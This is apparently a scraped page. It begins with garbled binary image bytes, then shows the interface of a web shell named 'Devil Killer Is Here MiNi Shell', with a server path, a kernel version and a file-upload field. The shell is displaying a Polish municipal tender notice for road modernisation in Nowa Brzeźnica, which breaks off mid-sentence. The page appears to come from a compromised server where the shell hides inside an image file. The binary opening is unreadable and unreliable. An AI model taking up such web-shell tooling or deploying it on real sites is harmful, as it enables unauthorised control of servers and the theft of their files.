JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230315/0013610101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową w Gminie Nowa Brzeźnica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA NOWA BRZEŹNICA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398669</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Brzeźnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-331</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 311 96 70</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@nowabrzeznica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">nowabrzeznica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową w Gminie Nowa Brzeźnica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e42503f2-c304-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00136101</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00072011/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową w Gminie Nowa Brzeźnica.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> nowabrzeznica.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">nowabrzeznica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy Marketplanet. Dopuszczalny format<br/>przesyłanych danych tj. plików o wielkości do 100 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z RODO tj. rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1). Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Gmina Nowa Brzeźnica reprezentowana przez Wójta Jacka Jarząbka<br/>Dane tele-adresowe Zamawiającego:<br/>Gmina Nowa Brzeźnica ul. Kościuszki 103, 98-331 Nowa Brzeźnica<br/>Adres e-mail: urzad@nowabrzeznica.pl<br/>Tel. (44) 311 96 70<br/>- w Gminie Nowa Brzeźnica wyznaczony został Inspektor Ochrony Danych, kontakt: iod@nowabrzeznica.pl<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym pn. „„Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową w Gminie Nowa Brzeźnica”; Znak sprawy: ZP.271.5.2023<br/>Pozostałe informacje dot. RODO zawarte zostały w Rozdziału I Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: „Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową w Gminie Nowa Brzeźnica – część 1”.<br/>Zakres części 1 obejmuje przebudowę i modernizację 14 odcinków dróg na terenie gminy Nowa Brzeźnica oraz montaż oświetlenia solarnego: <br/>1)	Przebudowa drogi wewnętrznej w Nowej Brzeźnicy;<br/>Działka nr ewidencyjny 6201, 6228 obręb Brzeźnica;<br/>2)	Przebudowa drogi wewnętrznej w Nowej Brzeźnicy; <br/>Działka nr ewidencyjny 6176 obręb Brzeźnica;<br/>3)	Przebudowa drogi wewnętrznej w Starej Brzeźnicy (ul. Ogrodowa) i w Nowej Brzeźnicy (ul. Spacerowa)<br/>Działka nr ewidencyjny 7388 obręb Brzeźnica;<br/>4)	Przebudowa drogi gminnej w Dubidzach – ul. Słoneczna;<br/>Działka nr ewidencyjny 545 obręb Dubidze;<br/>5)	Przebudowa drogi gminnej w Dubidzach – ul. Okrężna;<br/>Działka nr ewidencyjny 1558 obręb Dubidze;<br/>6)	Przebudowa drogi gminnej w Dubidzach – ul. Stawowa;<br/>Działka nr ewidencyjny 1733, 1839 obręb Dubidze;<br/>7)	Przebudowa drogi wewnętrznej Pieński Dubidzkie – Konstantynów;<br/>Działka nr ewidencyjny 1440 obręb Dubidze oraz działka nr ewidencyjny 142 obręb Konstantynów;<br/>8)	Przebudowa drogi wewnętrznej w Dworszowicach Kościelnych – ul. Żabia <br/>(część północna);<br/>Działka nr ewidencyjny 452 obręb Dworszowice Kościelne;<br/>9)	Przebudowa drogi wewnętrznej w Dworszowicach Kościelnych – ul. Żabia <br/>(część południowa);<br/>Działka nr ewidencyjny 738, 823 obręb Dworszowice Kościelne;<br/>10)	Przebudowa drogi gminnej w Rybakach;<br/>Działka nr ewidencyjny 5290 obręb Prusicko;<br/>11)	Przebudowa drogi wewnętrznej w Nowej Brzeźnicy (koło dworca PKP); <br/>Działka nr ewidencyjny 6617 oraz 6605 obręb Brzeźnica;<br/>12)	Przebudowa drogi wewnętrznej w Wólce Prusickiej;<br/>Działka nr ewidencyjny 407/3 oraz 275 obręb Wólka Prusicka;<br/>13)	Przebudowa drogi wewnętrznej w Kuźnicy (za kościołem);<br/>Działka nr ewidencyjny 1288/2 oraz 3660/2 obręb Kuźnica;<br/>14)	Przebudowa drogi gminnej w m. Orczuchy – Płaczki;<br/>Działka nr ewidencyjny 3515 oraz 3808 obręb Trzebca;<br/>15)	Oświetlenie miejsc niebezpiecznych – przy cmentarzu w Nowej Brzeźnicy;<br/>Działka nr ewidencyjny 6164 oraz 6138 obręb Brzeźnica;<br/><br/><br/>Szczegółowy opis przedmiotu zamówienia dla części 1 został zawarty w Rozdziale V SWZ, na który składają się następujące dokumenty:<br/><br/>1)	Projekt wykonawczy (karta technologiczna),<br/>2)	Specyfikacje Techniczne wykonania i odbioru robót,<br/>3)	Przedmiary robót stanowią jedynie materiał pomocniczy nie służący do obliczenia ceny oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>• Kryterium nr 1 - Cena oferty– 100 %<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 100 pkt.<br/>W kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą wartość (cena), zostanie<br/>zastosowany następujący wzór:<br/>Liczba Cn<br/>zdobytych (C) = ----------- x 100 x waga kryterium 100%<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/>100% – procentowe znaczenie kryterium ceny<br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez<br/>cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: „Pełnienie funkcji inspektora nadzoru inwestorskiego – część 2” nad realizacją zadań pn. „Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową <br/>w Gminie Nowa Brzeźnica”<br/>Zakres części 2 tj. pełnienia nadzoru inwestorskiego w zakresie robót budowlanych obejmuje <br/>w szczególności: <br/>1)	pełnienie kompleksowego nadzoru inwestorskiego w poszczególnych branżach (budowlanej, drogowej, elektrycznej, wod.-kan., telekomunikacyjnej) nad robotami budowlanymi opisanymi w dokumentacji projektowej wraz z wymaganiami szczegółowymi określonymi w SIWZ i Umowie na roboty budowlane zgodnie <br/>z przedmiotem zamówienia dla części 1: „Kompleksowa modernizacja dróg wraz ze zintegrowaną infrastrukturą drogową w Gminie Nowa Brzeźnica”<br/>2)	organizowanie, prowadzenie i protokołowanie narad koordynacyjnych z udziałem kierownika budowy i/lub kierowników robót branżowych, przedstawicieli Zamawiającego, wykonawców robót oraz innych zaproszonych osób; celem narad koordynacyjnych będzie omawianie bieżących spraw dotyczących wykonania <br/>i zaawansowania robót. <br/>3)	reprezentowanie Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, Przepisami Prawa Budowlanego, warunkami technicznymi, obowiązującymi normami oraz zasadami wiedzy technicznej, zasadami bezpieczeństwa i porządku publicznego (w tym BHP i P.POŻ.), jak również zawartą umową pomiędzy Inwestorem a wykonawcą robót budowlanych realizowanych <br/>w ramach zadania inwestycyjnego;<br/>4)	kontrolę materiałów i urządzeń dostarczanych na budowę, sprawdzanie ich jakości, zgodności z przedstawionymi dokumentami uprawniającymi do ich stosowania <br/>i dokumentacją wykonawczą, a w szczególności zapobieganie zastosowaniu materiałów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie;<br/>5)	sprawdzanie jakości wykonanych robót, wbudowanych wyrobów i urządzeń, <br/>w szczególności pod kątem ich zgodności z ofertą wykonawcy oraz dokumentacją projektową;<br/>6)	ciągłą kontrolę budowy w okresie trwania robót, obecność na budowie na każde żądanie Zamawiającego; Zamawiający dopuszcza do dłuższego niż 7 dni braku kontroli budowy w okresie trwania robót jedynie w nagłych losowych przypadkach oraz po wcześniejszym uzgodnieniu z przedstawicielem Zamawiającego okresu nieobecności; <br/>7)	zapoznanie się z treścią umów zawartych przez Zamawiającego z Wykonawcą robót budowlanych i nadzorowanie prawidłowego wykonywania tych umów, <br/>a w szczególności przestrzeganie harmonogramów realizacyjnych, i koordynowanie robót w poszczególnych branżach.<br/>8)	sprawdzanie i odbiór robót budowlanych, w tym również ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych oraz przygotowanie i udział w czynnościach odbiorowych. Wymaga się, aby Inspektor nadzoru inwestorskiego dokonał odbioru zgłoszonych przez Wykonawcę robót budowalnych robót zanikających i ulegających zakryciu oraz uczestniczył w próbach i odbiorach technicznych niezwłocznie, nie później jednak niż 3 dni robocze od daty zgłoszenia przez Wykonawcę robót budowlanych gotowości do odbioru i prób.<br/>9)	protokolarne potwierdzanie faktycznie wykonanych robót (bez prawa zwiększania zakresu robót) oraz usunięcia wad, a także kontrolowanie rozliczeń budowy <br/>z uwzględnieniem stanu zaawansowania robót;<br/>10)	akceptowanie, po uzgodnieniu z Zamawiającym, robót dodatkowych i zamiennych;<br/>11)	rozstrzyganie wątpliwości i sporów natury technicznej powstałych w toku prowadzonych robót; <br/>12)	udostępnianie Zamawiającemu na każde żądanie (pisemne bądź ustne) wszystkich dokumentów związanych z realizacją inwestycji w terminie do 3 dni, jeżeli jednak stworzenie tychże dokumentów (np. wyniki przeprowadzonych badań) nie będzie możliwe do wykonania w tym terminie, pisemne zobowiązanie inspektora co do terminu ich przekazania; <br/>13)	przyjęcie od wykonawcy robót budowlanych i parafowanie po sprawdzeniu dokumentacji powykonawczej wraz z atestami, certyfikatami na znak bezpieczeństwa, deklaracjami zgodności wbudowanych materiałów itp. oraz inwentaryzacji geodezyjnej;<br/>14)	sprawdzanie i opiniowanie kosztorysów rozliczeniowych (w tym dodatkowych, zamiennych i zaniechanych) oraz harmonogramu rzeczowo-finansowego robót <br/>w terminie 7 dni od dnia dostarczenia ich przez wykonawców; <br/>15)	uczestnictwo w przeglądach gwarancyjnych w okresie gwarancji i rękojmi;<br/>16)	w zakres niniejszego zamówienia wchodzi również nadzór nad ewentualnymi robotami zamiennymi i dodatkowymi wykonywanymi przez Wykonawcę robót dla niniejszego zadania;<br/>17)	kontrola i prowadzenie wraz z kierownikiem budowy rozliczeń materiałów pochodzących z rozbiórki/demontażu przez cały czas realizacji zadania inwestycyjnego;<br/>18)	zawiadomienie Inwestora o każdym przypadku przebywania na terenie budowy osób nieupoważnionych do wykonywania przedmiotu zamówienia w szczególności niezgłoszonych w trybie art. 6471 kodeksu cywilnego Zamawiającemu podwykonawców, firm i innych osób trzecich, a biorących udział w wykonaniu przedmiotu umowy;<br/>19)	ocenianie wszelkich roszczeń i problemów wynikłych podczas wykonywania robót budowlanych i zgłaszanych przez wykonawcę robót budowlanych oraz rekomendowanie rozwiązań zapobiegającym sporom i opóźnieniom, gdy jest to wykonalne;<br/>20)	w zakresie niniejszego zamówienia wchodzi również nadzór nad robotami wykonywanymi przez podwykonawców dla danego zadania inwestycyjnego.<br/>21)	egzekwowanie utrzymywania porządku na Terenie budowy,<br/>22)	egzekwowanie od Wykonawcy Umowy Robót budowlanych przebywania w trakcie prowadzenia robót Kierownika budowy oraz kierowników robót branżowych na Terenie budowy oraz aby wykonywali swoje obowiązki z należytą starannością. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>• Kryterium nr 1 - Cena oferty– 100 %<br/>W ramach tego kryterium Wykonawca może otrzymać maksymalnie 100 pkt.<br/>W kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą wartość (cena), zostanie<br/>zastosowany następujący wzór:<br/>Liczba Cn<br/>zdobytych (C) = ----------- x 100 x waga kryterium 100%<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/>100% – procentowe znaczenie kryterium ceny<br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez<br/>cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej:<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności dla <br/>części 1 zamówienia tj. o zamówienie może ubiegać się wykonawca który :<br/>A.	zrealizował (rozpoczął i zakończył) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane polegające na budowie, rozbudowie lub przebudowie dróg publicznych o wartości minimum:<br/>a.	2 500 000,00 zł brutto<br/>B.	dysponuje lub będzie dysponował osobami zdolnymi do wykonywania zamówienia tj. kierownikiem budowy, posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej określone przepisami ustawy Prawo budowlane.<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności dla części 2 zamówienia tj. o zamówienie może ubiegać się wykonawca który 